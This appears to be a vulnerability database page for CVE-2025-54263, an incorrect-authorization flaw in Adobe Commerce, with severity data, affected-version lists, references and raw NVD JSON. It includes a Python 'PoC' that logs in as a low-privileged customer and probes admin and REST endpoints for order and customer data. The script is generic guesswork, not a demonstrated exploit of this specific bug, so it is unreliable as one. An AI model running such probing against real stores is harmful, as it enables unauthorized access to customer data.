CVE-2025-54263

Description

Adobe Commerce versions 2.4.9-alpha2, 2.4.8-p2, 2.4.7-p7, 2.4.6-p12, 2.4.5-p14, 2.4.4-p15 and earlier are affected by an Incorrect Authorization vulnerability. A low-privileged attacker could leverage this vulnerability to bypass security measures and maintain unauthorized access. Exploitation of this issue does not require user interaction.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:commerce:2.4.4:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce:2.4.4:p1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce:2.4.4:p10:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce:2.4.4:p11:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce:2.4.4:p12:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:p1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:p10:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:p11:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:p12:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:-:*:*:open_source:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:p1:*:*:open_source:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:p10:*:*:open_source:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:p11:*:*:open_source:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:p12:*:*:open_source:*:*:* - VULNERABLE

Adobe Commerce 2.4.9-alpha2

Adobe Commerce 2.4.8-p2

Adobe Commerce 2.4.7-p7

Adobe Commerce 2.4.6-p12

Adobe Commerce 2.4.5-p14

Adobe Commerce 2.4.4-p15

Adobe Commerce 所有更早版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-54263 Adobe Commerce Incorrect Authorization PoC
# This PoC demonstrates the concept of exploiting incorrect authorization
# in Adobe Commerce to bypass security measures as a low-privileged user.

import requests

TARGET_URL = "https://target-adobe-commerce-site.com"
LOW_PRIV_USER = "attacker_user"
LOW_PRIV_PASS = "attacker_password"

def exploit_incorrect_authorization():
    """
    Exploit incorrect authorization vulnerability in Adobe Commerce.
    The vulnerability allows low-privileged users to access admin-only
    resources or APIs without proper authorization checks.
    """
    session = requests.Session()

    # Step 1: Authenticate as a low-privileged user (e.g., customer account)
    login_url = f"{TARGET_URL}/customer/account/loginPost/"
    login_data = {
        "login[username]": LOW_PRIV_USER,
        "login[password]": LOW_PRIV_PASS,
        "form_key": get_form_key(session, TARGET_URL)
    }
    response = session.post(login_url, data=login_data)

    if not is_authenticated(response):
        print("[-] Authentication failed")
        return False

    print("[+] Authenticated as low-privileged user")

    # Step 2: Attempt to access restricted admin resources
    # Due to incorrect authorization, these may be accessible
    restricted_endpoints = [
        "/admin/sales/order/",
        "/rest/V1/customers/search",
        "/rest/V1/orders",
        "/admin/customer/index/",
        "/rest/all/V1/customers/me"
    ]

    for endpoint in restricted_endpoints:
        url = f"{TARGET_URL}{endpoint}"
        response = session.get(url)

        if response.status_code == 200 and "Access Denied" not in response.text:
            print(f"[+] Unauthorized access granted: {endpoint}")
            # Extract sensitive data from response
            print(response.text[:500])

    return True

def get_form_key(session, url):
    """Retrieve the CSRF form key from the login page."""
    response = session.get(f"{url}/customer/account/login/")
    # Parse form_key from response (simplified)
    import re
    match = re.search(r'form_key.*?value="([^"]+)"', response.text)
    return match.group(1) if match else ""

def is_authenticated(response):
    """Check if the login was successful."""
    return "logout" in response.text.lower()

if __name__ == "__main__":
    exploit_incorrect_authorization()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-54263
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-54263
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-54263/
[4] VulDB https://vuldb.com/cve/CVE-2025-54263
[5] https://helpx.adobe.com/security/products/magento/apsb25-94.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-54263", "sourceIdentifier": "[email protected]", "published": "2025-10-14T21:15:34.893", "lastModified": "2025-10-20T13:47:20.320", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Commerce versions 2.4.9-alpha2, 2.4.8-p2, 2.4.7-p7, 2.4.6-p12, 2.4.5-p14, 2.4.4-p15 and earlier are affected by an Incorrect Authorization vulnerability. A low-privileged attacker could leverage this vulnerability to bypass security measures and maintain unauthorized access. Exploitation of this issue does not require user interaction."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:-:*:*:*:*:*:*", "matchCriteriaId": "D258D9EF-94FB-41F0-A7A5-7F66FA7A0055"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p1:*:*:*:*:*:*", "matchCriteriaId": "4E5CF6F0-2388-4D3F-8FE1-43B8AF148564"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p10:*:*:*:*:*:*", "matchCriteriaId": "1C3D7164-1C5F-40BC-9EEC-B0E00CD45808"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p11:*:*:*:*:*:*", "matchCriteriaId": "68AAE162-5957-42AF-BE20-40F341837FAC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p12:*:*:*:*:*:*", "matchCriteriaId": "D9D01159-3309-4F6B-93B0-2D89DDD33DEE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p13:*:*:*:*:*:*", "matchCriteriaId": "91736E79-D8E7-4AF2-8E01-A7B4EB8AD6F4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p14:*:*:*:*:*:*", "matchCriteriaId": "8412C043-64E7-4DFF-A303-13A6FE113BFB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p15:*:*:*:*:*:*", "matchCriteriaId": "BBDA2BCF-E784-4CF3-B30D-6FF5BEE2055F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p2:*:*:*:*:*:*", "matchCriteriaId": "D6D6F1A7-ABB5-4EDC-9EA8-98B74518847A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p3:*:*:*:*:*:*", "matchCriteriaId": "CFEBDDF2-6443-4482-83B2-3CD272CF599F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p4:*:*:*:*:*:*", "matchCriteriaId": "6661093F-8D22-450F-BC6C-A8894A52E6A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p5:*:*:*:*:*:*", "matchCriteriaId": "2515DA6D-2E74-4A05-BD29-FEEF3322BCB6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p6:*:*:*:*:*:*", "matchCriteriaId": "69A1F1F7-E53C-40F3-B3D9-DC011FC353BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p7:*:*:*:*:*:*", "matchCriteriaId": "6A56E96C-6CE5-442C-AA88-F0059B02B5E7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p8:*:*:*:*:*:*", "matchCriteriaId": "8867F510-201C-4199-8554-53DE156CE669"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p9:*:*:*:*:*:*", "matchCriteriaId": "23988132-DD4E-4968-B6B8-954122F76081"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:-:*:*:*:*:*:*", "matchCriteriaId": "9B07F7B2-E915-4EFF-8FFC-91143CEF082E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p1:*:*:*:*:*:*", "matchCriteriaId": "7F5E9DB6-1386-4274-8270-2FE0F0CAF7FD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p10:*:*:*:*:*:*", "matchCriteriaId": "5764CC97-C866-415D-A3A1-5B5B9E1C06A6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p11:*:*:*:*:*:*", "matchCriteriaId": "E82D10D8-2894-4E5B-B47B-F00964DD5CDE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p12:*:*:*:*:*:*", "matchCriteriaId": "B044F2D9-E888-4852-8A40-DCE688860ED3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p13:*:*:*:*:*:*", "matchCriteriaId": "6423C754-36F9-4680-9211-60940ED63E79"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p14:*:*:*:*:*:*", "matchCriteriaId": "3472064A-8C79-436B-965A-96834AE8D346"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p2:*:*:*:*:*:*", "matchCriteriaId": "8605E4E6-0F7D-42C8-B35B-2349A0BEFC69"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p3:*:*:*:*:*:*", "matchCriteriaId": "B6318F97-E59A-4425-8DC7-045C78A644F8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p4:*:*:*:*:*:*", "matchCriteriaId": "324A573E-DBC8-42A0-8CB8-EDD8FBAB7115"}, {"vulnerable": true, ... (truncated)